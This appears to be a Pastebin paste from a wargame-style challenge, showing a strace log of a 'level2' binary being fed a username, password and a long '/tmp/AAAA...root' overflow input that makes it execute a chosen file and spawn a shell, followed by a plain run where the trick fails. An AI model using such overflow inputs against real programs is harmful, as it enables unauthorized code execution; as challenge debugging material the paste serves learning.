API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 1st, 2016
94
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.40 KB | None | 0 0
raw download clone embed print report
  1. running with strace (it works)
  2.  
  3. write(1, "Username: ", 10Username: ) = 10
  4. read(0, nobody
  5. "nobody\n", 1024) = 7
  6. write(1, "Password: ", 10Password: ) = 10
  7. read(0, Ksdkjkk32avsh
  8. "Ksdkjkk32avsh\n", 1024) = 14
  9. write(1, "Command: ", 9Command: ) = 9
  10. read(0, /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAroot
  11. "/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 1024) = 101
  12. write(1, "Good job!\n", 10Good job!
  13. ) = 10
  14. geteuid32() = 1002
  15. geteuid32() = 1002
  16. geteuid32() = 1002
  17. setresuid32(1002, 1002, 1002) = 0
  18. execve("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAroot", ["/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"...], [/* 0 vars */]) = 0
  19. brk(0) = 0x8063000
  20. access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  21. mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
  22. access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
  23. open("/etc/ld.so.cache", O_RDONLY) = 3
  24. fstat64(3, {st_mode=S_IFREG|0644, st_size=17644, ...}) = 0
  25. mmap2(NULL, 17644, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fda000
  26. close(3) = 0
  27. access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  28. open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY) = 3
  29. read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0po\1\0004\0\0\0"..., 512) = 512
  30. fstat64(3, {st_mode=S_IFREG|0755, st_size=1360008, ...}) = 0
  31. mmap2(NULL, 1370424, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e8b000
  32. mmap2(0xb7fd4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x149) = 0xb7fd4000
  33. mmap2(0xb7fd7000, 10552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd7000
  34. close(3) = 0
  35. mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e8a000
  36. set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e8a8d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
  37. mprotect(0xb7fd4000, 8192, PROT_READ) = 0
  38. mprotect(0xb7ffe000, 4096, PROT_READ) = 0
  39. munmap(0xb7fda000, 17644) = 0
  40. getpid() = 12868
  41. rt_sigaction(SIGCHLD, {0x80563f0, ~[RTMIN RT_1], 0}, NULL, 8) = 0
  42. geteuid32() = 1002
  43. getppid() = 12867
  44. brk(0) = 0x8063000
  45. brk(0x8084000) = 0x8084000
  46. getcwd("/levels", 4096) = 8
  47. ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B9600 opost isig icanon echo ...}) = 0
  48. ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B9600 opost isig icanon echo ...}) = 0
  49. rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
  50. rt_sigaction(SIGINT, {0x80563f0, ~[RTMIN RT_1], 0}, NULL, 8) = 0
  51. rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
  52. rt_sigaction(SIGQUIT, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
  53. rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
  54. rt_sigaction(SIGTERM, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
  55. open("/dev/tty", O_RDWR) = 3
  56. fcntl64(3, F_DUPFD, 10) = 10
  57. close(3) = 0
  58. fcntl64(10, F_SETFD, FD_CLOEXEC) = 0
  59. ioctl(10, TIOCGPGRP, [12867]) = 0
  60. getpgrp() = 12867
  61. rt_sigaction(SIGTSTP, NULL, {SIG_DFL, [], 0}, 8) = 0
  62. rt_sigaction(SIGTSTP, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
  63. rt_sigaction(SIGTTOU, NULL, {SIG_DFL, [], 0}, 8) = 0
  64. rt_sigaction(SIGTTOU, {SIG_IGN, ~[RTMIN RT_1], 0}, NULL, 8) = 0
  65. rt_sigaction(SIGTTIN, NULL, {SIG_DFL, [], 0}, 8) = 0
  66. rt_sigaction(SIGTTIN, {SIG_DFL, ~[RTMIN RT_1], 0}, NULL, 8) = 0
  67. setpgid(0, 12868) = 0
  68. ioctl(10, TIOCSPGRP, [12868]) = 0
  69. wait4(-1, 0xbffffc5c, WNOHANG|WSTOPPED, NULL) = -1 ECHILD (No child processes)
  70. write(2, "$ ", 2$ ) = 2
  71. read(0, ls
  72. "ls\n", 8192) = 3
  73. stat64("/usr/local/sbin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
  74. stat64("/usr/local/bin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
  75. stat64("/usr/sbin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
  76. stat64("/usr/bin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
  77. stat64("/sbin/ls", 0xbffffb80) = -1 ENOENT (No such file or directory)
  78. stat64("/bin/ls", {st_mode=S_IFREG|0755, st_size=112700, ...}) = 0
  79. clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e8a938) = 12876
  80. setpgid(12876, 12876) = 0
  81. wait4(-1, level1 level1.c level2 level2.c level3 level3.c level4 level4.c
  82. [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], WSTOPPED, NULL) = 12876
  83. --- SIGCHLD (Child exited) @ 0 (0) ---
  84. sigreturn() = ? (mask now [])
  85. ioctl(10, TIOCSPGRP, [12868]) = 0
  86. wait4(-1, 0xbffffc5c, WNOHANG|WSTOPPED, NULL) = -1 ECHILD (No child processes)
  87. write(2, "$ ", 2$ ) = 2
  88. read(0,
  89.  
  90.  
  91. (did not work)
  92.  
  93. level2@rzt-bin01:/levels$ ./level2
  94. Username: nobody
  95. Password: Ksdkjkk32avsh
  96. Command: /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAroot
  97. Good job!
  98. level2@rzt-bin01:/levels$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!